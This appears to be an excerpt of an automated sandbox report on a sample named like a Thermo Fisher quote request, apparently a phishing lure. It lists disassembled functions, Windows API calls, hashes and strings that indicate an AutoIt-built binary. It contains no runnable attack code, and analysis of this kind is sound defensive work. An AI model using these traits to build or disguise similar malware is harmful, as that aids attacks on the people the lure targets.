                                                              • Instruction ID: 8f4b7215f2fc86a7098a1b9e5aebd9dfbf9b6b4c1f19aae0d9aada355edf3b35
                                                              • Opcode Fuzzy Hash: 52c9542a9a9fa4bca9bb33aebabf4a49cbbe0a718fb48747c009f36d6b044a3a
                                                              • Instruction Fuzzy Hash: 60E0ED31100240BADF216B64EC0DBD87B63AF56339F14D766F6A9580E5C7714981DB21
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063B2DF
                                                              • UnloadUserProfile.USERENV(?,?), ref: 0063B2EB
                                                              • CloseHandle.KERNEL32(?), ref: 0063B2F4
                                                              • CloseHandle.KERNEL32(?), ref: 0063B2FC
                                                                • Part of subcall function 0063AB24: GetProcessHeap.KERNEL32(00000000,?,0063A848), ref: 0063AB2B
                                                                • Part of subcall function 0063AB24: HeapFree.KERNEL32(00000000), ref: 0063AB32
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: a7d38b472126b72ffc2d864af9fd828799f54f701e4a24b8f45939523dbf81ed
                                                              • Instruction ID: 926638aa0197a0391c4a9e898424b3c5f8b32eaeaf16dbde6abc089ccfab3ff5
                                                              • Opcode Fuzzy Hash: a7d38b472126b72ffc2d864af9fd828799f54f701e4a24b8f45939523dbf81ed
                                                              • Instruction Fuzzy Hash: 5BE0B63A104005BBDB012FA5EC08859FBA7FF993613109321F625815B1CB32A871EBA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 219f3a502434bea6572c93c67bef3b9a5aca9ca7217e74cc853180e6e34cab2b
                                                              • Instruction ID: 571bb0551ab326e971b49e6fcb0b871e36d08e891c87f3cb1b23df5270c38136
                                                              • Opcode Fuzzy Hash: 219f3a502434bea6572c93c67bef3b9a5aca9ca7217e74cc853180e6e34cab2b
                                                              • Instruction Fuzzy Hash: 5BE04FB1100208FFDB006F70C848A6D7BA7FB4C350F15EA09FD5A87291DB7498818B60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 528286941ba7dc90dc78b78d188b76495c5e4408b2548659910c77a78803c97e
                                                              • Instruction ID: 1fc507ca63b5e741e08a4a61dc8633ad231b9596bd3d2d518353e3eaada9d314
                                                              • Opcode Fuzzy Hash: 528286941ba7dc90dc78b78d188b76495c5e4408b2548659910c77a78803c97e
                                                              • Instruction Fuzzy Hash: 18E04FB1500204FFDB006F70C84856D7BA6FB4C390F159A09F95A87290DB7498818B60
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0063DEAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container
                                                              • API String ID: 3565006973-3941886329
                                                              • Opcode ID: 2df0c27442a27d82fdaa2eecc792c825114e91f5a49c5b6bbc02bbe1a7371d28
                                                              • Instruction ID: 7cc29a2920d5e981fcb3ba22b149527e720e9be44546f60fe0d91eb955c5e697
                                                              • Opcode Fuzzy Hash: 2df0c27442a27d82fdaa2eecc792c825114e91f5a49c5b6bbc02bbe1a7371d28
                                                              • Instruction Fuzzy Hash: 2C913870600601AFDB54DF64D884BAABBFABF49710F14856DF84ACB691DB71E841CBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy
                                                              • String ID: I/g$I/g
                                                              • API String ID: 3048848545-13021658
                                                              • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                              • Instruction ID: bde3ad5595bcb59556bd1be63efde225ae589119949e7044df6cfe7748cd8021
                                                              • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                              • Instruction Fuzzy Hash: 3F41FA31900217AACF25EF99D4619FDB772EF48310FA4505EF881A7295DB309EC2C7A4
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 0061BCDA
                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0061BCF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: be3a557a95603bf2dcee66177a06c2b965fd38d947cf9c979e9ff1a28adbe05a
                                                              • Instruction ID: 16462d984abe544d0e8acb1766ff7af5563abd0ddf010a13f854add57cc9b752
                                                              • Opcode Fuzzy Hash: be3a557a95603bf2dcee66177a06c2b965fd38d947cf9c979e9ff1a28adbe05a
                                                              • Instruction Fuzzy Hash: 9B5168B14087499BE360AF24DC96BAFBBEDFF94354F444C4DF1C8410A2EB7085A98756
                                                              APIs
                                                                • Part of subcall function 006044ED: __fread_nolock.LIBCMT ref: 0060450B
                                                              • _wcscmp.LIBCMT ref: 0064C65D
                                                              • _wcscmp.LIBCMT ref: 0064C670
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: af1c1b65db06beebbff01b4ac81ffabde06450deace3bceb9fe022999817357d
                                                              • Instruction ID: 122f77e39d1ea58a1239fb509b2b8d5aed6fd1c73c3a83fb54eec2be7d086d6e
                                                              • Opcode Fuzzy Hash: af1c1b65db06beebbff01b4ac81ffabde06450deace3bceb9fe022999817357d
                                                              • Instruction Fuzzy Hash: 8741D872A4021ABBDF60DAA4DC81FEF77BADF49714F014069F605EB281DB709A04CB65
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0066A85A
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0066A86F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: 9dbfd261282cd694aae9cdab08827f84677c7033895ecb3063044ee2333027a8
                                                              • Instruction ID: c7cdd7fd76c227fab4125e88d7327020771b8caacfd8ca6fb706480ac551ad7c
                                                              • Opcode Fuzzy Hash: 9dbfd261282cd694aae9cdab08827f84677c7033895ecb3063044ee2333027a8
                                                              • Instruction Fuzzy Hash: 6C41FA78E013099FDB54CFA5C881BEABBBAFF09300F14016AE905AB341D770A942CF91
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0066980E
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0066984A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 87a64b242f18fc8ffcd3e991f7eafef062e971fde7aa18ab7a16d92e1033d651
                                                              • Instruction ID: 77e8eac0b5f7ab0186627d190507a05b51826c0de7fbb6f3109f4a8ed1403ba7
                                                              • Opcode Fuzzy Hash: 87a64b242f18fc8ffcd3e991f7eafef062e971fde7aa18ab7a16d92e1033d651
                                                              • Instruction Fuzzy Hash: AD316B71110604AAEB109F74CC81BFB77AEFF99764F10961DF9A9C7290DA31AC81C764
                                                              APIs
                                                              • _memset.LIBCMT ref: 006451C6
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00645201
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 32ea9fc68b4fb86da76a17b1176e2d04d058f4ee3fa65dd483f7d5e38daba732
                                                              • Instruction ID: 5f365993515ef1be000d92a29475180712e27de4825a3c9a658ea34a1f7a10e2
                                                              • Opcode Fuzzy Hash: 32ea9fc68b4fb86da76a17b1176e2d04d058f4ee3fa65dd483f7d5e38daba732
                                                              • Instruction Fuzzy Hash: 9231A531600708EBEB25CF99D845BEFBBF6EF45350F14401EE986A62A2D7B09B44CB51
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf
                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                              • API String ID: 2391506597-2584243854
                                                              • Opcode ID: 8359c930edac7dbf3636d877ff626eda0263c622b6eb4cb27b1aafb8a204e43c
                                                              • Instruction ID: f8c6ab0e88a47afff7a333319e5e934747e94ed1ae96a073c254450993aaa513
                                                              • Opcode Fuzzy Hash: 8359c930edac7dbf3636d877ff626eda0263c622b6eb4cb27b1aafb8a204e43c
                                                              • Instruction Fuzzy Hash: 44217371640118AFCF54EF64C882EEE77B6AF45700F40045DF405AB291DB70EE45CBAA
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0066945C
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00669467
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: b68ffee4d5114583706f0a939176317189a02992cd2bd8036e2628cae9c923c2
                                                              • Instruction ID: 5c9bdb62c0bc6ed19c1eae8c175858b73125d6f2db35d38cfbf619e4764f531b
                                                              • Opcode Fuzzy Hash: b68ffee4d5114583706f0a939176317189a02992cd2bd8036e2628cae9c923c2
                                                              • Instruction Fuzzy Hash: 88115EB12106087BEF119E54DC81EFB37AFEB993A4F104129FD199B290DA719C529770
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • GetActiveWindow.USER32 ref: 0066DA7B
                                                              • EnumChildWindows.USER32(?,0066D75F,00000000), ref: 0066DAF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveChildEnumLongWindows
                                                              • String ID: T1e
                                                              • API String ID: 3814560230-1869729051
                                                              • Opcode ID: 99229f4cad4f13d753e6f06d83c21177d12600ca639d552e1ff4bd700f04b2bb
                                                              • Instruction ID: 9154e1090f19b3a84df4293072e4c26349a340104726a265a52a5156a5e3442a
                                                              • Opcode Fuzzy Hash: 99229f4cad4f13d753e6f06d83c21177d12600ca639d552e1ff4bd700f04b2bb
                                                              • Instruction Fuzzy Hash: 5F213975604201DFCB24DF69D850AB677E7EB5B320F29161DF86A8B3E1DB30A850CB60
                                                              APIs
                                                                • Part of subcall function 0061D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0061D1BA
                                                                • Part of subcall function 0061D17C: GetStockObject.GDI32(00000011), ref: 0061D1CE
                                                                • Part of subcall function 0061D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0061D1D8
                                                              • GetWindowRect.USER32(00000000,?), ref: 00669968
                                                              • GetSysColor.USER32(00000012), ref: 00669982
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: f20b5cfa2c93be8cf0006f75bdf44c2d2daeee7ff671e2eab34cd503af3881a7
                                                              • Instruction ID: 69f1d7a59d38aeed64ac727cb8f2eb2fece2152a1d0c7e34d4efdcfaeafea663
                                                              • Opcode Fuzzy Hash: f20b5cfa2c93be8cf0006f75bdf44c2d2daeee7ff671e2eab34cd503af3881a7
                                                              • Instruction Fuzzy Hash: 6D114472620209BFDB04DFB8C845AFA7BAAFB08344F051629FD55E2250E634E851DB60
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00669699
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006696A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: aec0598e28088ac9d8bf803874813cfe5c2f097de726ea0a43a068d921b5cf00
                                                              • Instruction ID: 3cc1d48b9937fb0f1d9893c523ed0aa129c3fcaed7e1b35f7ad4d6de3c6c86dc
                                                              • Opcode Fuzzy Hash: aec0598e28088ac9d8bf803874813cfe5c2f097de726ea0a43a068d921b5cf00
                                                              • Instruction Fuzzy Hash: 56114371100208AAEF109FA4DC80AEA3B6FEB053A8F504324FD65D62E0C6359C91AB60
                                                              APIs
                                                              • _memset.LIBCMT ref: 006452D5
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006452F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 6091fd87d5d213421452bcaed736b1be182083b66c4e370d348ed239b2cc18b9
                                                              • Instruction ID: 3e79a53916f8de88bf08fb8e1f7dddc98740438e7b27fff2c675a616a86b2252
                                                              • Opcode Fuzzy Hash: 6091fd87d5d213421452bcaed736b1be182083b66c4e370d348ed239b2cc18b9
                                                              • Instruction Fuzzy Hash: 9211D375901614ABDB11EF98DD04FEA77AAAB07B50F040116E903A7296E3B0AE04C7A1
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00654DF5
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00654E1E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: d5c0f9c7563e99ba8661dae70933b0001403838c7d1c33ed6cde6f9f8bab2e62
                                                              • Instruction ID: 5fbdd86f643b0fbac60ca9a2d742c5a66c8788595b37f2865eb4174a2da5fb8f
                                                              • Opcode Fuzzy Hash: d5c0f9c7563e99ba8661dae70933b0001403838c7d1c33ed6cde6f9f8bab2e62
                                                              • Instruction Fuzzy Hash: 8E11A070501221BBDB258F51CC89EFBFBBAFF0675AF10826AF90556240DB705989D6F0
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006337A7
                                                              • ___raise_securityfailure.LIBCMT ref: 0063388E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
